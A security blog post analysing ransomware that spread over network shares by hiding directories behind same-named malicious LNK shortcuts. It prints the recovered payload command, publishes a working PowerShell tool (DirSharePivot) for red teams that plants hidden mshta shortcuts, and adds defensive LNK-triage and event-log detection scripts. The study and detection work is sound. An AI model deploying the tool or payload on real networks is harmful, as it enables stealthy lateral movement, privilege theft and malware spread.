Abusing network shares for efficient lateral movements and privesc (DirSharePivot)



Background

About a year ago my team and I were called to perform a forensic analysis on a customer network. The reason for this was that a computer had first been infected by ransomware, and for some (unknown) reason, several other workstations were getting "infected" after only 3 hours.
After 5 hours (time of my intervention) I discovered that:
- 80% of the workstations were infected
- The network was partially segmented, but the infection occurred on all segments
- A malware process was even running on the file server as... "Domain Administrator" :-/
- No trace of 4624 (Logon Type 3) events or any other trace of lateral movement/authentication
Interesting... hum :)

In this article I will describe my analysis of the threat and also how to take advantage of this method in a "safer" and more "controlled" way to move laterally (or even perform privesc) in red team operations (practical exploitation code will be provided).
This method may be particularly useful in segmented/restricted networks and could be used to circumvent SIEM detections whose use cases rely only on network flows and Windows authentication events.
I will also suggest some blue team possibilities to catch this kind of attack.
Nice read :)

Lateral movement abusing user interactions

After finding the "patient 0", I finally saw something weird on the main network shares:
(Screenshot: partial view of a network share showing the "supposed" directory links)
This looks interesting... I asked some employees and they told me that these links were legitimate and that when they clicked on them they accessed the normal contents without issue... (furthermore, DFS can present shares that look like LNK shortcuts).
But I decided to analyze this...


A "dir -Force" in the network share returns the following listing, showing the very interesting way the threat is hidden:
- The original directories are set to "Hidden" (-h-)
- Next to each of them, a LNK file is created with the original directory name

(Screenshot: dir -Force output in the current share)

LNK File analysis
An analysis of one of the .LNK files confirmed that:
- a malicious payload is embedded
- the LNK uses a "Directory" icon (Shell32.dll, icon index 3)

Malicious payload:
.\Windows\system32\cmd.exe /c start explorer.exe "Intel" & type "3b5a5b29263677d600.exe" > "%temp%\3b5a5b29263677d600.exe" &&
"%temp%\3b5a5b29263677d600.exe"      
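The LNK analysis above can be automated for triage. The following Python script is an added example (it is not the article's code and not part of the DirSharePivot tool): it parses a shortcut following the MS-SHLLINK layout (fixed header, optional IDList and LinkInfo, then the StringData strings), extracts the icon index, relative path and arguments, and scores the indicators described in this article: a folder icon borrowed from shell32.dll index 3, a script/command interpreter as launcher, inline VBScript with a hidden window, staging in %temp%, and a hidden directory of the same name next to the .lnk. The launcher keyword list and the scoring rules are my own choices; the two shortcut fixtures and the directory listing are constructed samples, with the payload replaced by a placeholder.

```python
# Added example (not the article's code): parse a Windows .LNK file following the
# MS-SHLLINK layout and score the indicators the article describes, plus a listing
# check for ".lnk shadowing a hidden directory of the same name". The launcher list,
# scoring rules and the fixture files are my own assumptions/constructions.
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData flags, in the order the strings appear in the file
STRING_FLAGS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                (0x20, "arguments"), (0x40, "icon_location")]
LAUNCHERS = ("mshta", "cmd.exe", "cmd /c", "powershell", "wscript", "cscript", "rundll32")


@dataclass
class LnkSummary:
    icon_index: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def _read_string(data: bytes, off: int, unicode: bool) -> Tuple[str, int]:
    # StringData = CountCharacters (uint16) followed by the characters, no terminator
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", errors="replace"), off + count


def parse_lnk(data: bytes) -> LnkSummary:
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)      # LinkFlags
    (icon_index,) = struct.unpack_from("<i", data, 56)  # IconIndex
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:                 # skip IDListSize + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                           # skip LinkInfo (first field is its size)
        off += struct.unpack_from("<I", data, off)[0]
    summary = LnkSummary(icon_index=icon_index)
    for flag, field in STRING_FLAGS:
        if flags & flag:
            value, off = _read_string(data, off, bool(flags & IS_UNICODE))
            setattr(summary, field, value)
    return summary


def triage(data: bytes, hidden_sibling_dir: bool = False) -> List[str]:
    """Return the article's indicators this shortcut matches (empty list = nothing found)."""
    s = parse_lnk(data)
    text = " ".join(v for v in (s.relative_path, s.working_dir, s.arguments) if v).lower()
    reasons = []
    if s.icon_location and "shell32.dll" in s.icon_location.lower() and s.icon_index == 3:
        reasons.append("folder icon borrowed from shell32.dll index 3")
    if any(launcher in text for launcher in LAUNCHERS):
        reasons.append("target or arguments run a script/command interpreter")
    if "vbscript:" in text or "vbhide" in text:
        reasons.append("inline VBScript launched with a hidden window")
    if "%temp%" in text:
        reasons.append("stages a file in %temp%")
    if hidden_sibling_dir:
        reasons.append("a hidden directory with the same name sits beside it")
    return reasons


def fake_directory_links(entries: List[Tuple[str, bool, bool]]) -> List[str]:
    """entries = (name, is_directory, is_hidden) as obtained from a share listing;
    returns the .lnk names that shadow a hidden directory of the same name."""
    hidden_dirs = {name.lower() for name, is_dir, hidden in entries if is_dir and hidden}
    return sorted(name for name, is_dir, _ in entries
                  if not is_dir and name.lower().endswith(".lnk") and name[:-4].lower() in hidden_dirs)


def build_fixture_lnk(relative_path: str, arguments: str, icon_location: str, icon_index: int) -> bytes:
    """Constructed test fixture: header + StringData only (no IDList/LinkInfo), Unicode strings."""
    flags = IS_UNICODE | 0x08 | 0x20 | 0x40
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, icon_index, 1, 0, 0, 0, 0)

    def s(v: str) -> bytes:
        return struct.pack("<H", len(v)) + v.encode("utf-16-le")
    return header + s(relative_path) + s(arguments) + s(icon_location)


# Constructed samples: one mirroring the article's shortcut (payload replaced by a placeholder), one benign
SUSPICIOUS_LNK = build_fixture_lnk(
    r"..\Windows\System32\mshta.exe",
    r'vbscript:Close(Execute("Set x = CreateObject(""WScript.shell""): x.Run ""cmd /c explorer.exe K:\test\Intel & <PAYLOAD-PLACEHOLDER>"",vbhide"))',
    r"C:\Windows\System32\shell32.dll", 3)
BENIGN_LNK = build_fixture_lnk(r"..\Docs\Report.docx", "", r"C:\Windows\System32\shell32.dll", 1)
SAMPLE_LISTING = [("Intel", True, True), ("Intel.lnk", False, False), ("HR", True, True),
                  ("HR.lnk", False, False), ("Public", True, False), ("readme.txt", False, False)]

if __name__ == "__main__":
    for name in fake_directory_links(SAMPLE_LISTING):
        print(name, "->", triage(SUSPICIOUS_LNK, hidden_sibling_dir=True))
```

In practice you would feed fake_directory_links the names and attributes returned by listing the share, then run triage on the bytes of each flagged .lnk. A non-empty reason list marks a candidate for isolation and hash extraction, not proof on its own: legitimate folder shortcuts also use the shell32 icon, so the combination of indicators (icon plus interpreter plus hidden sibling directory) is what matters.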


What does it mean?
When a user clicks on any "fake directory":
- An explorer window is opened on the "real" (hidden) directory, making the user think everything is legit thanks to explorer.exe "Intel"
- The malware is copied onto the victim's machine (into %temp%)
- The malware is finally executed locally!
- Once activated, the malware tries to infect all other shares accessible from this new victim
- In the end we have a "continuously" improving lateral movement over the whole network thanks to user actions (network share access)!

In a few minutes or hours the whole network may become infected, depending on the volume of access to the network share.

Benefits for the attacker
This lateral movement technique is:
- Particularly efficient (a whole domain may be compromised in a few hours)
- A possible privilege escalation! Indeed, everyone in a company uses network shares, so you are likely to get more and more accounts and privileges; in this case, even a logged-on Domain Admin used the network share and compromised their account!
- Not hindered by network segmentation, as the spreading point is a network share
- Likely not detected by IDS/SIEM, as it does not trigger any authentication attempts or network scanning from a single host

Using this technique in Red Team operations
As shown previously, this technique may be of great interest when standard privesc/lateral movement techniques fail (high patch level, strong segmentation, etc.) during red team engagements.
For this usage it would be very dangerous to pOwn users who would then infect all the shares they can access... (cleaning that up at the end of the engagement may be a pain :D)
In this context I have developed the following PowerShell code to limit this effect to a single, specific directory.
Furthermore, the original method was noisy and not optimized:
- "cmd /c" was noisy as it briefly showed a console window...
- the payload was written to disk (we are in 2017 :) )
To get rid of this I have used an mshta command line running cmd (it is not mandatory, as everything could be done using VBScript) with the "vbhide" option to hide any possible window; detection is also limited with an in-memory payload (no payload written on disk).


function DirSharePivot
{
 <#
 .SYNOPSIS
 Function: DirSharePivot
 Author: David ROUTIN - 13 nov 2017

 Example:
 DirSharePivot -StartDir K:\test -Payload "powershell -enc XXXXXXXXXXXXXXXXXXXXXXXX"

 This will set all the directories in the defined path as Hidden (non-recursive, to keep control). After that, a LNK file containing your payload will be created with the
 name of each hidden directory.
 This LNK will have a "directory shortcut icon", will open an Explorer window on the selected directory when the user clicks on it, and will execute your defined payload.
 #>
 [CmdletBinding()] Param(
    [Parameter(Position = 0, Mandatory = $True)]
    [String]
    $StartDir,

    [Parameter(Position = 1, Mandatory = $True)]
    [String]
    $Payload
 )

 # Only the immediate subdirectories of $StartDir (no recursion); -Force also lists already hidden ones
 $Filepath = Get-ChildItem -Path $StartDir -Force -Directory
 foreach ($Object in $Filepath) {
    # Obfuscated spelling of the string "Hidden": sets the Hidden attribute on the real directory
    $Object.Attributes = (-join "uRtHoirdebn"[3,5,7,7,8,10])

    # Create <StartDir>\<DirName>.lnk. Its target is mshta running an inline VBScript that
    # opens Explorer on the real (hidden) directory and then runs the payload, window hidden (vbhide).
    # $Object.Name is used explicitly: stringifying a DirectoryInfo gives the name on Windows PowerShell
    # but the full path on PowerShell 7, which would break the concatenation below.
    $Shell = New-Object -ComObject ("WScript.Shell")
    $ShortCut = $Shell.CreateShortcut($StartDir + "\" + $Object.Name + ".lnk")
    $ShortCut.TargetPath = "mshta.exe"
    $ShortCut.Arguments = 'vbscript:Close(Execute("Set x = CreateObject(""WScript.shell""): x.Run ""cmd /c explorer.exe ' + $StartDir + "\" + $Object.Name + " & " + $Payload + '"",vbhide "))'
    $ShortCut.WindowStyle = 1
    $ShortCut.Hotkey = "CTRL+SHIFT+F"
    $ShortCut.IconLocation = "C:\windows\System32\shell32.dll, 3"   # stock folder icon (index 3)
    $ShortCut.Description = $Object.Name
    $ShortCut.Save()
 }
}


Blue team actions

Even if not perfect, several tactics may be deployed to detect/prevent this spreading method.

- Audit process tracking and create use cases based on the usage of sensitive MS-signed binaries (mshta, powershell, rundll32...)
- Actively monitor PowerShell executions
- Properly control write permissions on the main directories of your shares
- Use AppLocker to limit the risk of unnecessary usage of MS-signed binaries
- Activate "Audit Object Access" and monitor sensitive shares or parts of them (enabling this on a high-volume corporate share may have a negative performance impact) to detect specific .LNK files.
For example, if you have a "Honeypot" directory, you may track the creation of "Honeypot.lnk" (event 4656)
- Create a SIEM rule to monitor multiple .LNK file creations on shares (monitoring event 5145 may be an option at the file server level)
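The last two bullets can be turned into a concrete rule. The Python below is an added example (not the article's code): it consumes file-server audit records shaped like event 5145 (SubjectUserName, IpAddress, ShareName, RelativeTargetName, AccessMask), keeps only requests for write access to a *.lnk path, raises a "honeypot" alert when the name matches the decoy the article suggests, and raises a "burst" alert when one account from one source address writes several distinct .lnk files on the same share within a short window, which is the fingerprint of the shadowing step described above. The event records are constructed samples; the threshold (3 files) and window (5 minutes) are my own starting values, to be tuned on real volumes.

```python
# Added example (not the article's code): burst and honeypot detection over constructed
# event 5145 records from a file server. Field names follow the 5145 event data; the
# threshold and window are assumptions to tune on real share traffic.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

WRITE_BITS = 0x2 | 0x4                 # FILE_WRITE_DATA/FILE_ADD_FILE and FILE_APPEND_DATA
HONEYPOT_NAMES = {"honeypot.lnk"}      # the article's "Honeypot" directory -> Honeypot.lnk


def is_lnk_write(ev: Dict[str, object]) -> bool:
    """True for a 5145 event requesting write access to a *.lnk path on a share."""
    return (ev["EventID"] == 5145
            and str(ev["RelativeTargetName"]).lower().endswith(".lnk")
            and bool(int(str(ev["AccessMask"]), 16) & WRITE_BITS))


def detect_lnk_bursts(events, threshold: int = 3, window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """Return honeypot alerts plus one burst alert per (user, ip, share) that writes
    at least `threshold` distinct .lnk files within `window`."""
    alerts = []
    per_actor = defaultdict(list)
    for ev in events:
        if not is_lnk_write(ev):
            continue
        path = str(ev["RelativeTargetName"])
        if path.rsplit("\\", 1)[-1].lower() in HONEYPOT_NAMES:
            alerts.append({"type": "honeypot", "user": ev["SubjectUserName"],
                           "ip": ev["IpAddress"], "path": path})
        key = (ev["SubjectUserName"], ev["IpAddress"], ev["ShareName"])
        per_actor[key].append((datetime.fromisoformat(str(ev["TimeCreated"])), path.lower()))
    for (user, ip, share), writes in per_actor.items():
        writes.sort()
        start = 0
        for end, (ts, _) in enumerate(writes):            # sliding window over sorted writes
            while writes[start][0] < ts - window:
                start += 1
            distinct = {p for _, p in writes[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append({"type": "burst", "user": user, "ip": ip, "share": share,
                               "count": len(distinct), "first": writes[start][0].isoformat(),
                               "last": ts.isoformat()})
                break                                      # one burst alert per actor
    return alerts


def _ev(t, user, ip, share, path, mask):
    return {"TimeCreated": t, "EventID": 5145, "SubjectUserName": user, "IpAddress": ip,
            "ShareName": share, "RelativeTargetName": path, "AccessMask": mask}


# Constructed sample: jdoe shadows three directories in a few seconds, asmith touches the decoy
SAMPLE_EVENTS = [
    _ev("2017-11-13T09:00:01", "jdoe", "10.1.2.3", r"\\*\Projects", r"Intel.lnk", "0x2"),
    _ev("2017-11-13T09:00:02", "jdoe", "10.1.2.3", r"\\*\Projects", r"HR.lnk", "0x2"),
    _ev("2017-11-13T09:00:02", "jdoe", "10.1.2.3", r"\\*\Projects", r"Intel.lnk", "0x120089"),  # read only, ignored
    _ev("2017-11-13T09:00:04", "jdoe", "10.1.2.3", r"\\*\Projects", r"Finance.lnk", "0x2"),
    _ev("2017-11-13T09:10:00", "asmith", "10.1.2.9", r"\\*\Projects", r"Docs\meeting.lnk", "0x2"),
    _ev("2017-11-13T09:11:30", "asmith", "10.1.2.9", r"\\*\Projects", r"Honeypot.lnk", "0x2"),
    _ev("2017-11-13T09:12:00", "asmith", "10.1.2.9", r"\\*\Projects", r"notes.txt", "0x2"),
]

if __name__ == "__main__":
    for alert in detect_lnk_bursts(SAMPLE_EVENTS):
        print(alert)
```

The access-mask filter is what keeps the rule quiet on a busy share: every user opening a shortcut generates 5145 read events, while only the planting step asks for write access. Pair the burst alert with a check that a hidden directory of the same name exists beside each new .lnk to cut the remaining false positives (users occasionally create folder shortcuts by hand, but rarely several in one minute).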

David Routin
